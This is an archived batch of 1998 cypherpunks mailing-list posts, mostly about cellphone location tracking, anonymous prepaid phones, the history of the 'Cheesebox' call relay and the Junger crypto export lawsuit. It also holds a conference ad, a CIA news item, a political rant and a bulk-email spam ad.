Registration fees before July 10th are $995, after the 10th are $1195 US.

To register please use the online registration page at
https://convmgmt.com/security/reg.htm

Current payment methods include American Express, Master Card, Visa, and
company checks and money orders.  You will receive a confirmation letter
in the mail informing you of a successful registration.

****************************************************************************                   
                             Hotel Information


Network Security Solutions '98 will take place July 29th and 30th at the
Plaza Hotel & Casino in Las Vegas, Nevada. To take advantage of conference
rates, reservations must be made prior to June 9. When making arrangements,
please reference Network Security Solutions.

The Plaza Hotel and Casino, 
Number One Main Street
Las Vegas, NV
Phone: 1-800-634-6575 

****************************************************************************
              Network Security Solutions Summer '98 Sponsors


Aventail Corporation


http://www.aventail.com/

Aventail (tm) Corporation is the pioneer of policy-based Virtual Private
Network (VPN) software solutions.  Its award winning product, Aventail VPN
(tm) , enables corporations to privately communicate, share applications,
and securely exchange business-critical information over the Internet with
their business partners, customers, suppliers, and remote/mobile employees.
Aventail's adherence to open security standards simplifies VPN deployment,
enables interoperability, and leverages corporations' existing network
investments.

Network Flight Recorder


http://www.nfr.com/

Network Flight Recorder builds traffic analysis and monitoring tools that
help you see how your network is being used.  Nobody's network is
shrinking or getting less complicated - and networking is becoming the
lifeblood of many modern businesses.  In other words, your job is getting
harder and more important.  Network Flight Recorder's monitoring package
gives you a flexible, user-programmable system that lets you: Recover or
monitor online transaction records, keep historical statistics about how
your network grows, generate detailed breakdowns of how your network
services are being used and by whom, watch for patterns of abuse of
network resources and identify the culprit in real-time, set burglar
alarms that alert you to security violations or unexpected changes in
your network, log and monitor who went where on your network, and
replay attackers' sessions and learn what they did.

Knowledge is power, and knowing what's going on within your network is
the key to keeping it operating smoothly. Like our namesake, the aircraft
flight recorder, our system records the information you want about what
happened when, where, and how. If you need to go back and look at a
reliable record of events, your Network Flight Recorder is the first
place to check. 

We are dedicated to providing the best possible tools for understanding
your network traffic, so you can maintain it and secure it. 

Counterpane Systems


http://www.counterpane.com/


Counterpane Systems is a cryptography and computer security consulting
firm. We are a virtual company based in Minneapolis, with three full-time
employees and six part-time contractors.  Counterpane provides expert
consulting on Design and Analysis.  This is the majority of
Counterpane's work: making and breaking commercial cryptographic systems
and system designs.  We can analyze all aspects of a security system,
from the threat model to the cryptographic algorithms, and from the
protocols to the implementation and procedures.  Our detailed reports
provide clients with information on security problems as well as
suggested fixes.
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 22 Apr 1998 20:28:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Assume The Position, Escrhole!
Message-ID: <199804230328.VAA05034@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain


  Lt.Carnal Karns, Antsin Mia Frantz, et al, are undoubtedly first class
TechnoWarriors and/or OhmResistance Fighters in the InfoWar being fought
on the new Electronic BattleGround. However, I can't help but wonder if 
even the most brilliant of technical solutions to potential BigBro tools
such as 'position escrow' are of any use, in the long run, if the majority
of society continues to unquestionably accept any form of unconstitutional
intrusion into their lives, as long as it comes in 'a pretty red box', or
is promoted by Michael Jordan as a 'must have' March To Battan model.

  I find it interesting that TechnoWarrior accomplishments such as the GSM
exloit seem to have more effect on the psyches of those concerned with the
'constitutional rights' of corporations and governments, rather than being of 
great concern to the average individual.
  I find it disconcerting that governments and corporations recognize the
dangers to their own position and power by an all-seeing BigBro, while
the Sheeple rush to take advantage of the latest in Digital Implants, in
order to take advantage of the 'convenience' and 'safety' that results
from having themselves, their children and their goldfish tracked and
monitored by governments and corporations from the moment of their birth
to the day of their last purchase at the '[YourNameHere] Tombstone Shop'.

  Perhaps what the Digital rEvolution needs is a Marketing Manager and a seat
on the NASDAQ.
  How does the 'Michael Jordan Remailer' sound? 'Nike Nukes', with a joint
advertising campaign with Samsonite and Timex?

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff" <kurtbuff@halcyon.com>
Date: Wed, 22 Apr 1998 21:31:49 -0700 (PDT)
To: "'Marcus J. Ranum'" <die@die.com>
Subject: RE: Position escrow
In-Reply-To: <3.0.3.32.19980422014512.0069aa8c@mail.clark.net>
Message-ID: <000301bd6e70$7ea6e020$7c293fce@kurtb.minuteman.org>
MIME-Version: 1.0
Content-Type: text/plain


Too stupid?

Consider that the original SPECIES movie was sold as "Aliens with tits" <A
quote from the recollections of a person at the meeting where the script was
sold>!

*I* don't think it's too stupid.


| Hmmmm.... Makes me think that a great way to make
| progress is for cypherpunks to start submitting scripts to hollywood
| about presidents who get in massive trouble when their personal
| communications are subpoenaed and crypto keys are de-escrowed to
| prove that they had sex with office staff....
|
| Nah, that's too stupid...
|
| mjr.
| --
| Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
| work - http://www.nfr.net
| home - http://www.clark.net/pub/mjr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Austin Hill <austin@total.net>
Date: Wed, 22 Apr 1998 18:30:30 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Position escrow (triangulation, cell "remailers")
Message-ID: <199804230130.VAA29002@wacky.total.net>
MIME-Version: 1.0
Content-Type: text/plain


The Navy's Onion Routing project (www.onion-router.net) actual makes 
reference to anonymous cell phone networks by using encrypted proxies 
(Onions).  The current implementation is IP based, but the briefing 
documents refer to any public networks including pager and cell networks.

-Austin
Quoted text from Phil Karn (karn@qualcomm.com ) on 4/22/98 12:33 PM

>>On cell "remailers": Why resend the cell signal?  Why not instead set up a
>>generic phone call resender, which could be used by cell users and
>>non-users alike?  As long as you use the call resender for all of your
>>important calls, the feds (and others) will find it very difficult to
>>figure out what cell phone ID to triangulate or home phone number to tap
>
>Exactly. And I think this brings the remailing concept full
>circle. Wasn't the basic idea invented for telephones way back in
>(alcohol) Prohibition days? As I recall, a device called a "cheesebox"
>connected two phone lines. When a call came in on one line, it went
>back out on the other. You'd place a cheesebox in some third party's
>back room, e.g., a restaurant owner who was paid for the privilege and
>to keep his mouth shut. If the cops traced a call, it would lead them
>to the restaurant owner, who would tip off the bootleggers.
>
>Does anyone have any historical references for these things? I think it
>would be fun to see how an earlier age made use of anonymous remailers
>based on a much simpler technology.
>
>Phil
>
>


_________________________________________________________________________
Austin Hill                                   Zero-Knowledge Systems Inc.
Chief Technical Officer                                  Montreal, Quebec
Phone: 514.286.2636                                     Fax: 514.286.2755
_________________________________________________________________________
"Anonymity represents for many people a liberating even more than a 
threatening phenomenon."
                                         -Harvey Cox, The Secular City





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Thu, 23 Apr 1998 06:53:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NSA GAK Report Up
In-Reply-To: <199804142336.TAA04962@camel7.mindspring.com>
Message-ID: <199804231353.IAA25633@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 AM 4/15/98 -0800, Lee Tien wrote:
>Do we know how the report was acquired?  It says "2/18/98  NSA, X3"  I
>think X9 is a standards committee for banks, cf. NSA's comments re adoption
>of 3DES; is X3 as well?  Is that where this came out?  Or was it through a
>FOIA request or a leak?

I believe it was made public by the NSA.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Thu, 23 Apr 1998 09:37:07 -0700 (PDT)
To: Toto <toto@sk.sympatico.ca>
Subject: Re: Assume The Position, Escrhole!
In-Reply-To: <199804230328.VAA05034@harrier.sasknet.sk.ca>
Message-ID: <3.0.5.32.19980423093515.007e2b10@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 PM 4/22/98 -0600, you wrote:
>
>
>  Perhaps what the Digital rEvolution needs is a Marketing Manager and a seat
>on the NASDAQ.
>  How does the 'Michael Jordan Remailer' sound? 'Nike Nukes', with a joint
>advertising campaign with Samsonite and Timex?
>
>Toto
>

Bayer anthrax -with a special non irritating coating.
Sarin by Raid -with a pleasant forest scent.
Portable E-jammers and tempest gear from The Edge
Body armor by Calvin Klein
Martha Stewart's Guide to improvised landmines



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

  No electrons were harmed in the making of this message.

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Thu, 23 Apr 1998 09:53:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CIA to Kids: I Spy, You Spy
Message-ID: <3.0.5.32.19980423095352.007eb100@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


	
Wednesday April 22 3:57 PM EDT 

CIA to Kids: I Spy, You Spy

By Jim Wolf 

WASHINGTON (Reuters) - The Central Intelligence Agency has unveiled a World
Wide Web site aimed at introducing the spy game to the
kindergarten set. 

The CIA's "Home Page for Kids" at www.odci.gov/cia/ciakids, features
geography quizzes, interactive disguise games and thumbnail sketches of
cloak-and-dagger figures dating back to the Revolutionary War against
Britain. 

It also showcases "Who We Are and What We Do," a very basic primer on
intelligence-gathering and analysis. 

"What we're really trying to do is encourage kids to use computers, explore
geography and give them an understanding of what the CIA does," said Anya
Guilsher, an agency spokeswoman. 

"We're also putting a human face on the people who work here," she said. 

The section on those behind the scenes opens with a shot of a woman
possibly meant to personify the CIA's vision of the American James Bond for
the
late 1990s. 

Slender, smiling and black, she is conservatively dressed in a white blouse
and smartly tailored outfit. Other pages give a glimpse of an espionage
operation, complete with a man wearing dark glasses and a trench coat. 

"If you worked in the Directorate of Operations, you would like to travel
and have a great curiosity about the world and its different cultures,"
reads the
text in the People section. 

"You would like to work with people from all over the world, be able to
adapt to any situation (especially dangerous ones!), be well educated, know
other languages, be good at working at with other kinds of people, and be
courageous, well disciplined, and able to accept anonymity," it says. 

The text goes on to explain that such undercover operatives -- whose job
typically includes recruiting foreigners to steal secrets for the United
States --
know they will toil chiefly in the twilight. 

"The rewards for the officer are the knowledge that he or she contributed
to the security of our country and is recognized by his or her peers," the
text
adds. 

The site lays out the work of the CIA's other three branches as well --
those analyzing intelligence for policymakers, solving science and technology
challenges ("To work beyond the state of the art every day is normal in
this directorate") and administering the CIA's estimated 16,000 full-time U.S.
employees and its $3 billion budget. 

One fringe benefit of the site, which went online last month, is that it
helps CIA personnel explain their jobs to their kids, said Karen Gilbert,
an agency
public affairs specialist who was part of the four-woman design team. 

"Finally people who work here now have a way to talk to children about what
they do here," she said in an interview at CIA headquarters in the
Washington suburb of Langley, Virginia. 

To appeal to children as young as six, the designers picked the CIA's
bomb-sniffing canine corps of Black Labradors and Belgian Shepherds to conduct
"first-person" tours of the CIA's leafy campus. The site will be updated
regularly. 

The Web site, which the agency said has been receiving as many as 950
visits a day, contains links to the CIA's signature World Factbook and the
agency's main Web page, said to get almost two million "hits" a month. 

The kid page has nothing to do with recruiting future U.S. spies, the
agency said. But job-seekers can read about pay and benefits by clicking on
the
employment tab on the main site. 

It stems from an executive order last April 19 in which President Clinton
told federal agencies to match White House efforts to put more educational
material online for children. 

The CIA effort, hardened against would-be hackers and housed on computers
separate from those used for its sensitive work, was done on "a real
shoestring budget," said Gilbert. 


http://dailynews.yahoo.com/headlines/top_stories/story.html?s=z/reuters/9804
22/news/stories/cia_2.html



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"But if we have to use force, 
	it is because we are America;
	we are the indispensable nation." 
		---Secretary of State Madeleine K. Albright


	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 23 Apr 1998 10:25:55 -0700 (PDT)
To: Phil Karn <die@die.com
Subject: Re: Position escrow
In-Reply-To: <19980417175445.54922@die.com>
Message-ID: <v03102800b1646eb8b3e3@[24.234.31.56]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:08 PM -0700 4/21/98, Phil Karn wrote:
>I expect the main countermeasure to cellular position tracking will be
>the use of one-way pagers. Keep your cell phone turned off, and if you
>get a page when you're someplace you don't want them to know, wait
>until you leave before you return the page.
>
>Perhaps if the "just turn it off" approach is widely promoted, the
>carriers and vendors will see the threat to their business and press
>for some safeguards. Otherwise they just won't give a damn.

Another, more sophisticated measure is to replace the omni with a
directional antenna (corner reflectors are pretty small at analog cellular
frequencies and above and can have excellent gain and front-to-back
ratios).  The disparity of your received signal between different cell
sites, plus the near-far problem for CDMA systems, could make accurate
location much more difficult.

--Steve


PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------
Steve Schear              | tel: (702) 658-2654
CEO                       | fax: (702) 658-2673
Lammar Laboratories       |
7075 West Gowan Road      |
Suite 2148                |
Las Vegas, NV 89129       | Internet: schear@lvdi.net
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Todd" <dantodd@dnai.com>
Date: Thu, 23 Apr 1998 10:52:42 -0700 (PDT)
To: "Phil Karn" <Geraint.Price@cl.cam.ac.uk>
Subject: Re: Position escrow
Message-ID: <002f01bd6ee0$67bcd480$026610ac@danhome.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


There is a similar (probably a number of them) service in parts of the US.
While visiting Michigan recently I saw a wireless phone with a "calling
card" from a company called Isis.  It appeared to be an anonymous, pre-paid
cellular phone but I didn't investigate to see if it runs on standard
cellular or if they ask for and verify personal information upon purchase.
I've also seen this product advertised on DSS (I don't recall what market)
and the commercial seems to support this as an anonymous service.

I guess the advantages are that is wouldn't give up any identifying
information while still allowing for tracking in an emergency.

cheers,
dan


-----Original Message-----
From: Geraint Price <Geraint.Price@cl.cam.ac.uk>
To: Phil Karn <karn@qualcomm.com>
Cc: frantz@netcom.com <frantz@netcom.com>; geer@world.std.com
<geer@world.std.com>; die@die.com <die@die.com>; cypherpunks@toad.com
<cypherpunks@toad.com>; cryptography@c2.net <cryptography@c2.net>;
Geraint.Price@cl.cam.ac.uk <Geraint.Price@cl.cam.ac.uk>
Date: Thursday, April 23, 1998 10:39 AM
Subject: Re: Position escrow


>
>> >One interesting, but unlikely possibility is an originate-only phone
which
>> >pays for calls with cash (e.g. Digicash, or a prepaid phone activation
>> >card).  Since it can't receive calls, it doesn't need an identity.  What
>> >would come out of the system is, "Someone in cell X called telephone
number
>> >Y."
>>
>> There's already a way to do this: cloning. This is not always done
>> just to avoid paying for service.  Certain cloners are entirely able
>> and willing to pay for cellular service, but they demand anonymity.
>>
>> Somebody should point out to the carriers that they could get rid of
>> much of the incentive to clone phones if they simply offered a
>> legit way to remain anonymous.
>>
>> Phil
>
>This technology already exists in Britain (I don't know about any other
>countries), where you can buy a mobile without any subscription information
>off the shelf. To use the mobile, you go and purchase a 'token' which
allows
>you to use the mobile on a pay-per-call basis much the same as a public
phone.
>I don't know the method of token implementation.
>
>The police have started kicking up a fuss over this technology as they
claim
>it hinders their investigation into criminal activity, because if they
trace a
>cellular phone which turns out to be one of this type then they can't pull
the
>info on the customer to go round knocking on doors.
>
>Geraint
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Crawford" <crawdad@fnal.gov>
Date: Thu, 23 Apr 1998 10:56:54 -0700 (PDT)
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Position escrow (triangulation, cell "remailers")
In-Reply-To: <199804221733.KAA25507@servo.qualcomm.com>
Message-ID: <199804231756.MAA16999@gungnir.fnal.gov>
MIME-Version: 1.0
Content-Type: text/plain


http://handel.pacific.net.sg/~seowjean/Mafia/mobname-c.html ...

Callahan, Gerald Michael 
(AKA: Cheesebox Callahan), 1909- 

Gerald Callahan was born and raised on the tough Lower East Side of New
York.  His father was a corrupt Prohibition agent who took payoffs from
bootleggers operating in lower Manhattan.  Through his father, who had some
loose ties to Tammany Hall, Callahan received his introduction to members of
the criminal underworld.

Gerry Callahan was good with his hands and proficient in electronics,
talents that served him well in later life.  After completing a two-year
course in electronics at a small college in Texas, Callahan worked at Bell
Laboratories, where he perfected his craft.

Armed with a wealth of knowledge, he quickly earned a reputation as the man
to see in the underworld if you needed a wire tapped or a phone bugged.  In
1931 Al Capone brought him to Chicago where he was hired to tap into the
racing wire, perfected by Mont Tennes who owned the Nationwide News
Service.  For years, Tennes and his associates had refused to allow the
Capone gang a partnership or a cut of the take.

The "wire," as it was known, disseminated race results to hundreds of
poolrooms and bookie operations directly from the tracks.  It was Callahan's
job to tap into the phone boxes, enabling the syndicate men to disrupt
Nationwide's service by sending along incorrect race results and payoff
information to the poolrooms.

Another favorite technique was to hold back results long enough for the
Capone men to get a bet down at the parlor even though the race had been
run.  "We wrecked at least twenty bookies, all of them big operators,"
Callahan recalled.  "We took a fortune from them.  The big guy in Florida
(Capone) was very happy, and I went back to New York with a suitcase full of
green."

Callahan completed at least 1,000 similar wiring jobs in his career and
never spent a day in jail, though he was twice convicted of violating the
New York wiretap law.  In each instance he drew suspended sentences.  In the
1950s Gerald Callahan earned the famous nickname he actually detested--
Cheesebox.  Working from his kitchen table in Flushing, N.Y., he invented a
small electronic device resembling a cheesebox.  It was a bookie's dream.
The cheesebox permitted a gambler to connect two telephones and speak with
his customers from a remote location.  This virtually guaranteed that a
horse parlor would be free of police raids.  Callahan installed his
cheesebox at a cost of $250 per unit and charged $100 a week in rental.  In
1960 he earned revenue from sixty of these devices functioning in the New
York area.

Callahan wore many hats in his day.  He was a self-described card cheat,
second-story man, and bookie.  Though he was out of the business by 1972,
the veteran wiretapper admitted that he would have enjoyed bugging the
Watergate Hotel.  "Only I wouldn't have used an army of men," he told a
reporter in 1975.  "I always worked alone.  I would have taken out (tapped)
every phone a distance away and set up recorders.  There's no way I would
have been trapped."  His autobiography, Cheesebox, written with Paul Meskil,
was published in 1975.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geraint Price <Geraint.Price@cl.cam.ac.uk>
Date: Thu, 23 Apr 1998 09:34:55 -0700 (PDT)
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804222049.NAA26335@servo.qualcomm.com>
Message-ID: <E0ySOw0-0002Oj-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> >One interesting, but unlikely possibility is an originate-only phone which
> >pays for calls with cash (e.g. Digicash, or a prepaid phone activation
> >card).  Since it can't receive calls, it doesn't need an identity.  What
> >would come out of the system is, "Someone in cell X called telephone number
> >Y."
> 
> There's already a way to do this: cloning. This is not always done
> just to avoid paying for service.  Certain cloners are entirely able
> and willing to pay for cellular service, but they demand anonymity.
> 
> Somebody should point out to the carriers that they could get rid of
> much of the incentive to clone phones if they simply offered a
> legit way to remain anonymous.
> 
> Phil

This technology already exists in Britain (I don't know about any other 
countries), where you can buy a mobile without any subscription information 
off the shelf. To use the mobile, you go and purchase a 'token' which allows 
you to use the mobile on a pay-per-call basis much the same as a public phone. 
I don't know the method of token implementation.

The police have started kicking up a fuss over this technology as they claim 
it hinders their investigation into criminal activity, because if they trace a 
cellular phone which turns out to be one of this type then they can't pull the 
info on the customer to go round knocking on doors.

Geraint






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: calendar@jann.com
Date: Thu, 23 Apr 1998 16:04:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Thank you for downloading Calendar.pl v1.1
Message-ID: <199804232303.SAA15868@adept.wizweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for downloading the Calendar.pl v1.1!

I will keep you up to date on all enhancements and bug fixes to the program via email from now on.


Again, thanks!
Jann Linder
jann@jann.com

-------------------------------------
For bug reports, please send email to: mailto:calendar_bug@jann.com
For questions, please email to: mailto:calendar@jann.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shari Steele <ssteele@eff.org>
Date: Thu, 23 Apr 1998 15:20:52 -0700 (PDT)
To: bernstein-announce@toad.com
Subject: Oral Argument to Be Held April 24 in Crypto Export Case
Message-ID: <353FBC15.63BC@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Everyone in the Akron area is encouraged to attend this hearing (8:30am, 
Akron federal courthouse) and show the judge how important it is that 
the export controls on encryption be repealed.  If you are able to 
attend, please remember to dress in your best courtroom attire and to be 
respectful of the court.

EFF and the Bernstein legal team wish Peter Junger, Gino Scarcelli and 
the rest of the Junger legal team the best of luck.  For more 
information on the Junger case, see 
http://samsara.law.cwru.edu/comp_law/jvd/.
Shari


       Oral Argument to Be Held April 24 in Crypto Export Case

    Stipulation of Undisputed Facts Filed in Law Suit Challenging
        Federal Licensing of Publishers of Encryption Software

                    Junger v. Daley on Fast Track

   ----------------------------------------------------------------

             Cleveland, Ohio, Monday, April 13, 1998
                        For Immediate Release

            
                    For More Information Contact:
 
                    Peter D. Junger (216) 368-2535
                    <junger@samsara.law.cwru.edu>

                    Raymond Vasvari (216) 522-1925
                   <freespeech@mail.multiverse.com>


        Or see URL: http://samsara.law.cwru.edu/comp_law/jvd/
 
To be added to, or removed from, the list of those who were sent this
 press release, please send e-mail to <lawsuit@upaya.multiverse.com>.

     _________________________________________________________________
   
Cleveland, Ohio, April 13 --

Arguments in Junger v. Daley, the law suit challenging the
constitutionality of the export regulations on encryption software,
will be held in front of Judge Gwin on April 24 at 8:30 AM at the
federal courthouse in Akron, Ohio.  The parties have filed a
Stipulation of Undisputed Facts which is now available from the
cryptography archive maintained by John Young at
<http://www.jya.com/pdj8.htm> and from the plaintiff's archive at
<http://samsara.law.cwru.edu/comp_law/jvd/pdj8.htm>.

The suit was brought by Peter Junger, a law professor at Case Western
Reserve University in Cleveland, Ohio against William Daley, the
United States Secretary of Commerce, to establish that the export
regulations restricting the publication of computer programs used to
protect privacy and confidentiality violate the freedoms of speech and
of the press guaranteed by the First Amendment to the United States
Constitution.

Those regulations, which apply only to publication on the Internet and
the World Wide Web and by other electronic means, but not to
traditional books or magazines, have been extensively challenged by
the computer industry and by civil rights groups.  There is now
legislation pending in Congress that would relax or abolish the
current restrictions on ``exporting'' encryption software,
restrictions that endanger the competitive position of the United
States software industry and effectively prevent many within the the
United States from obtaining the computer programs that they need to
preserve their privacy.

``Those are very important issues,'' Professor Junger says, ``but the
issues raised by my suit do not just affect encryption software.  If
the government can restrict the writing and publication of encryption
programs because they are useful--and that is basically what the
government is claiming--without regard to the authors' and publishers'
constitutional rights under the First Amendment, then, by the same
reasoning, it could forbid the publication of any computer program
that earns the disfavor of the authorities.  At this time of year, for
example, I find it easy to believe that the government would like to
forbid the publication of tax preparation software that the tax
collectors feel are too good at detecting loopholes.''

Both sides have asked for summary judgment and it is expected that
Judge Gwin will be able to decide the case shortly after the hearing
on the 24th without any further proceedings, but if any issues remain
to be be decided after that Judge Gwin has set July 20th as the date
on which the case will go to trial.

``It is good to be back on the fast track,'' Junger says,  ``and I am
confident that the case can be decided without a trial.  The dispute
is not about the facts.  The only real issue is whether, and to what
extent, the constitution protects the writing and publication of
computer programs.  And a trial is not going to be necessary to settle
that issue.

``But this is only the first step,'' he adds.  ``No matter who wins in
the district court, it is almost certain that the other side will
appeal the case.  My lawyers, and particularly Gino Scarselli, have
done a wonderful job at considerable personal sacrifice.  As I think
about the prospects of an appeal, I only hope that we can raise some
support for them.''

A fund has been established to defray the cost of this litigation and
contributions may now be sent to Professor Spencer Neth, Case Western
Reserve University Law School, Cleveland, OH 44106.  Checks should
bear the notation ``Junger Litigation Fund'' or ``Crypto Litigation
Fund.''

                           
                                 -30-

-- 
Shari Steele, Staff Attorney	    ssteele@eff.org
Electronic Frontier Foundation	    301.375.8856 (v)
P.O. Box 649			    301.283.5337 (f)
Bryans Road, MD  20616		    http://www.eff.org/homes/steele.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 23 Apr 1998 12:37:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: From Russia With Love
Message-ID: <199804231937.VAA26609@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


A CyberPsychotic wrote:
> So what you think?:)
>  I want to place it somewhere anonymously.. 
> 
>     ---------------------------------------------------------------
> <html><head><title>the Black List</title>
> </head>
> <body>
> <strong><center>The most honest page ever been made.<br>
> </center></strong>
> <p>
> <hr>
> Disclaimer: The things covered in this page are just expressing my
> sence of the reality. I don't even pretend to claim that my own opinions
> express the minds of all the people around, even though I feel that many friends
> of mine would agree with me here. Writing it I just use my right
>  for "speaking freely".If you get pissed off you'd better
> <a href=http://www.happytoy.com> leave it NOW</a>
> <hr>
> Description: This page covers the (su|o)bjects which generally have been
>  pissed me off during my life, so I decided to publish 'em. Wonder Why?
>  Just because I want to.. If you ever want to contribute you may send
>  me your ideas to <a href=mailto:fygrave@usa.net>fygrave@usa.net</a> However
>  if you feel like flaming me send it to <a href=mailto:root@localhost>separate
> address</a> so i could sort it out:-).
> <p>
> Be ready for the most disturbing and pathethic truth you ever heard..
> <p>
> <quote>Remark:Most of statements here are provoked by Tequila Breeze. Alas, Great Drink.
> </quote>
> <hr>
> <ul>
> <li> I hate <a href=http://www.online.kg>the Fucking Country</a> I live in...
> 
>  <p> Why? There are many reasons.<br>
>         <ul>
>         <li>This country makes me feel
>         like a bunch of monkeys rule it. They make rules and laws for people,
>         but what the fuck they don't follow 'em themsleves?
> 
>         <li> They have fucking right to claim we are democratic? But why the hell they violate even basic human rights ?
>         <li> They claim they build civilized country, but civilized country
> cares of its citizen, not robes them.
>         <li> They claim that everyone is equal before the face of law?
>         But What the FUCK some are more EQUAL than others? And why the hell,
>         they forget of equality when things start dealing with MoneY or Relatives?
> 
>         <li>You may claim that there are some (lots) of things which are free for now,
>         and which are "real freedom". But i will tell you that's because those
>         Morons just are too stupid to figure out how to exploit it, or it is just being
> 
>         overlooked .. yet... But be sure they will sell your country to <a href=http://www.whitehouse.gov>Yankee's Goverment</a> some Day..
> </ul>
> <li> Does it make you feel than any other country is better? No WAY.
>  Take a look on <a href=http://www.gov.ru> Russia </a>
> with their moronic Drunk-head President and Puppet-like parlament
> or <a href=http://www.whitehouse.gov> United States</a>
> with helpless president and crazyBUCK-ruled congress.I could state
> more arguments why those countries suck, but I'd better leave it for
>  those who <a href=http://www.antionline.com> live there</a>
> 
> <li><a href=http://www.microsoft.com> MiKr0SlopHt</a>
> <p>
>         If you are Wind0gze user, i hope there are even no reason to
>  explain You why MicroSloft sucks. Ever have found yourself standing
> Helpless before their stupid GUI and "Can't remove tmp directory. Reformatting Disk C:.." like message and wondering for the XXXth time "why the heck
>  i started using Microsoft products?", or finding one day morning all
>  your files being stolen and removed due to lame security<a href=http://oliver.efri.hr/~crv/security/bugs/NT/nt.html>(read NO SECURITY)</a>  developed by'em?
> 
> <li> Lamers and Wannabies<br> ..
> Hah... there are no MORE annoying people than those who think they KNOW everything or peretend to ..
> <li> Fuckin' Elite <br>
> I just can't understand why those fucks claim they are better than me
>  just because their Dads made more bucks that I do, or they could
> 
> move their asses there and here in the cars while i have to walk.
> </ul>
> </body>
> </html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 23 Apr 1998 13:27:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Position escrow
Message-ID: <199804232027.WAA04314@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Geraint Price wrote:
> This technology already exists in Britain (I don't know about any other
> countries), where you can buy a mobile without any subscription information
> off the shelf. To use the mobile, you go and purchase a 'token' which allows
> you to use the mobile on a pay-per-call basis much the same as a public phone.

Dan Todd wrote:
> 
> There is a similar (probably a number of them) service in parts of the US.
> While visiting Michigan recently I saw a wireless phone with a "calling
> card" from a company called Isis.  It appeared to be an anonymous, pre-paid
> cellular phone

Keep in mind that Timothy McVeigh thought he had anonymity with his
use of a prepaid 'anonymous' phone card over public payphones. He was
wrong. The testimony in this regard at McVeigh's trial was 'fixed'--not
in the 'facts' of tracing his identity, but in the 'timing' of tracing
his identity. i.e. - It was made to appear to be a longer and more
difficult process than it truly was.
It is highly unlikely that electronically-based 'anonymous' technology
is going to be any more untracable than meatspace-disseminated tools
of anonymity.

X-1.237Y-2.459Z-37.46Monger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: youropportunity98@mailexcite.com
Date: Fri, 24 Apr 1998 02:59:27 -0700 (PDT)
To: youropportunity98@mailexcite.com
Subject: We Mail 4 You !!!
Message-ID: <We mail 4 You !!!>
MIME-Version: 1.0
Content-Type: text/plain


    WE Mail 4 You- Just don't want the trouble? No problem We can 
take care of all your advertising needs. With no trouble for you.
Looking for responsive AOL, Prodigy, delphi, MCI, Compuserve
recipiants or any or all of our 50 Million email address recipiants.
Remember,people can't buy or use your services if  They don't
know about Them, and commercial email IS the cheapest
and most cost effective way to get the word out there.
We can get that news directly into the mailbox of good
prospective recipiants consistantly, So don't wait.
  
We Can Mail For You Now, while these prices last !!!


*First time customer Special !!!

*Advertise to 400,000 people for  $199     Special !!! 

Advertise to 1 Million people  for $999       SALE $799.99 sale

Advertise to 3 Million people  for $1995

Advertise to 5 Million people  for $2999

Advertise to 10 Million people  for $4995
       

Just give Us a call at 1888-365-0000  ext.1648
















Member of National Organization of Internet Commerce.  To have your name added
